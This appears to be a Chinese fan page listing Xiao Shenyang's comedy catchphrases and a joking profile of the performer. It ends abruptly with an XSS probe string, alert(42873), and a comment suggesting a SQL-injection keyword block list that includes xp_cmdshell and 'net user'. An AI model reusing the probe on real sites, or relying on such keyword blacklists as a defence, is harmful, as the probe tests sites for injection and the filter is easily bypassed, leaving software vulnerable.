60 出来吧四舅妈 ，那我叫你啥呢老婶 ！

61 就溜达piapia地，谁招我我也不回头，就溜达。

62 老妹儿你能抓住我呀！

63 老妹年啥时候来的啊，咋不给我打 *** 呢？

64 孩子，你先睡吧。谁把我名抠错了我出来改改”

66 哎呀我去，这不老萨吗，这不兰奇吗

67 ——哎呀嘛哥，你是不是唱二人转那小子，你叫小沈阳啊？

——是怎么地？

——哎呀妈呀，你瞅你长得哈，有一种大海的感觉呢

——小妹儿你是不是喜欢我呢，是不是爱上我了呢？

——哥吖，你别误会，我晕船，我一看到大海吧，我就想吐。

68 什么姑娘，人家是纯爷们

69 人生最痛苦的事情是，人死了，钱没花了~~~~~！

70 毕老师，你给我照个相呗~~

71 有，还是没有啊？

72 哎呀妈呀

73 你是？哎呀 懵住了，白岩松？不对！朱军？！等等我想想

老毕！哎呀妈呀！你是毕老师不？

妈呀你咋出来了哪？来人啊！毕老师跑出来了！来人啊~别一会儿跑了~

74 四舅妈：就我最欣赏你咧~你长得太创意了~跟车祸现场似的~~这半辈子就含着眼泪过die~下辈子我一定要找一个骑着白马的王子。

小沈阳：骑着白马的不一定是王子，唐僧有时也骑白马。

四舅妈：唐僧也比你强。

小沈阳：是，能过就过，不能过就吃肉~还能长生不老、。

75 老毕：你多大啦？~

小沈阳：免贵28.

76 哎呀妈呀 老牛B了

77.你说这玩意儿整的~

78.这个..真没有..

79 我的搭档并不好看，跟别的女孩不同，因为他是混血儿，他妈是沈阳的，他爸是天津的~

80 想开心看二人转,想闹心就看一下足球,想往死了闹心就看一下中国足球

[编辑本段] *** 版小沈阳档案

艺名：小沈阳

真名：沈鹤

性别：都说我是男的 纯爷们

血型：红色的

信仰：良心

爱好：女的

梦想：成为一名妇产科大夫

职业：二人转演员

最尊敬的人：母亲

最喜欢的运动：篮球 长跑

偶像：星爷 卓别林 孙红雷

对自己说的一句话：享受过程的美丽

对世界的一句话：给我一个梦想的舞台 我将还给世界一个奇迹

自己最牛B的一句话：我不是人 而且不是一个坏人 但我不是对所有的人都一样 特别是你

最喜欢听的一句话：你唱的比以前强多了

最压抑的时候：有话说不出口

对自己的要求：成为前无死人（古人死了不就是死人了吗）后无来者的人

弱点：唱

强项：富有 ***

最牛B的强项：敢玩命

要对观众说的一句话：我的演出对的起你们花钱买的门票 我用心的在这个舞台上给你演出

特长：特技 魔术 模仿

主要演出风格：说 幽默 脱口绣 动作滑稽 语出惊人

演出特点：喜欢互动 和观众开玩笑

个人对演出的看法：做为一名二人转演员 主要就是让观众开心 但我认为每个人的内心世界都有慈悲的一面 所有我选择了让观众感动让观众看我演出开心的同时 也有一棵感恩的心

基本功：功夫 小品 说口 唱 扮 舞 绝

主要荣誉：能和天下有良心的朋友一起合作

主要奖项：掌声 呐喊声 赞许的目光

二人转：

这门东北土生土长的艺术 使我东北这名小伙深深的爱上了它 是它给了我最求梦想的机会接近成功的阶梯 是它给了我最难忘的人生回忆 是它让我欢喜让我忧 是它让我体会到五味人生是它让我看到多彩的世界 是它让我遇见了我更爱的女人 是他让我走遍了神州的山山水水是它让我结交了这么多的好“朋友”是它````````

最想登上的舞台：是你用心为了建造的舞台

对艺人的理解：出于无奈 出于好奇 出于热爱 出于冲动 出于爱好`````` 走上的一条道路

对二人转的理解：个人观点 二人转演员用行话叫条丁 个人理解的意思就是调理别人的人叫条丁

跨站脚本攻击（XSS）alert(42873)

网站防SQL注入的代码有吧？

类似这样的code_string="',;,and,exec,insert,select,count,*,chr,asc,master,truncate,char,declare,net user,xp_cmdshell,/add,drop,from"

在代码里边再加几个：,%20,,我就是这么解决的